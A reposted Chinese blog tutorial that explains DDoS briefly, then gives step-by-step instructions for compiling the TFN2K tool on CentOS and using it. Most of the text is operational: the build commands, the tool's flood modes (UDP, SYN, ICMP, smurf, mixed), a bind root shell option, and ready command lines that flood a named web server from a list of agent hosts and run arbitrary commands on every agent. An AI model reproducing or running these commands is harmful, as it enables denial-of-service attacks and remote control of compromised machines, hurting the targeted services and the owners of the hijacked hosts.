linux 实现ddos

分布式拒绝服务(DDoS:Distributed Denial of Service)攻击指借助于客户/服务器技术，将多个计算机联合起来作为攻击平台，对一个或多个目标发动DoS攻击，从而成倍地提高拒绝服务攻击的威力。通常，攻击者使用一个偷窃帐号将DDoS主控程序安装在一个计算机上，在一个设定的时间主控程序将与大量代理程序通讯，代理程序已经被安装在Internet上的许多计算机上。代理程序收到指令时就发动攻击。利用客户/服务器技术，主控程序能在几秒钟内激活成百上千次代理程序的运行

实验环境

centos-5.5

实验软件

tfn2k.tgz

配置软件

tar zxvf tfn2k.tgz

cd tfn2k

vim src/ip.h

找到  124 struct in_addr

     125   {

     126     unsigned long int s_addr;

     127   };

改为  124 /*struct in_addr

     125   {

     126     unsigned long int s_addr;

     127   }; */

make         安装

make[1]: Entering directory `/root/tfn2k/src'

gcc -Wall -O3    disc.c   -o disc

disc.c: In function ‘main’:

disc.c:24: warning: implicit declaration of function ‘exit’

disc.c:24: warning: incompatible implicit declaration of built-in function ‘exit’

./disc

This program is distributed for educational purposes and without any

explicit or implicit warranty; in no event shall the author or contributors

be liable for any direct, indirect or incidental damages arising in any way

out of the use of this software.

I hereby certify that I will not hold the author liable for any wanted

or unwanted effects caused by this program and that I will give the author

full credit and exclusively use this program for educational purposes.

Do you agree to this disclaimer [y/n]? y

gcc -Wall -O3    mkpass.c   -o mkpass

./mkpass

server key [8 - 32 chars]:   输入8位密码

cd /root/tfn2k

./tfn                        如果看到这个，证明按住成功了

使用范例

-f 这个参数后面跟刚才所写的文本文件名,就是真正实现DDOS攻击,而不是DOS

-h DOS攻击,也就是单机,一对一的攻击 后面跟一个主机或IP地址

-p 后面指定一个端口,不用说了

-c 最关键的参数,一共有11个选相

0 - 停止攻击,发善心用的

1 反欺骗等级设定 ,的TFN这个工具在攻击的时候所发出的数据包是带有源地址的,但是源地址是随机的,也就是说地址不是你自给的

2 改编数据包的包尺寸:缺省的ICMP/8,smurf,udp攻击缺省使用最小包,你可以通过改变每个包的有效载荷的字节增加它的大小

3 绑定root shell:启动的个会话服务的然后你连接的个指定端口就可以得到的个root shell

4 UDP洪水攻击:这个攻击是利用这样的个事实:每个udp包被送往的个关闭的端口的这样就会有的个ICMP不可到达的信息返回的增加了攻击的能力

5 SYN洪水攻击:这个攻击有规律的送虚假的连接请求,结果会是目标端口拒绝服务的添瞒TCP连接表的通过对不存在主机的TCP/RST响应增加攻击潜力,是标准的拒绝服务攻击.

6 ICMP响应(ping)攻击:这个攻击发送虚假地址的ping请求的目标主机会回送相同大小的响应包

7 SMURF攻击:用目标主机的地址发送ping请求以广播扩大的这样目标主机将得到回复的个多倍的回复

8 MIX攻击:按照1:1:1的关系交替的发送udp,syn,icmp包的这样就可以对付路由器的其它包转发设备的NIDS,sn的fers等,轮番轰炸:)

9 TARGA3攻击

10 远程命令执行,这个参数是TFN的附加功能,其实TFN的攻击不仅仅是DOS,还可以远程的进行明令控制,如:

./tfn -f hostext -c 10 -i "mkdir /root/edison" 在所有的HOST上root家目录建立edison,-i后面跟"命令"

./tfn -f hostext -c 4 -i www.xxx.com
hostext文件中记录的主机对163服务器进行UDP攻击(所有的主机中必需已经起动td进程)

./tfn -f hostext -c 5 -i www.xxx.com -p 80

使用hostext文件中记录的主机对163服务器进行TCP拒绝服务攻击(80攻击WEB,其他不用说了)

./tfn -f hostext -c 6 -i www.xxx.com
使用hostext文件中记录的主机对163服务器进行ICMP攻击(PING攻击,缓冲区溢出马上死机)

./tfn -f hostext -c 8 -i www.xxx.com
使用hostext文件中记录的主机对163服务器进行ICMP&TCP&UDP轮番攻击

./tfn -f hostext -c 0

让所由主机停止攻击

本文转自 mailfile 51CTO博客，原文链接：http://blog.51cto.com/mailfile/1330181，如需转载请自行联系原作者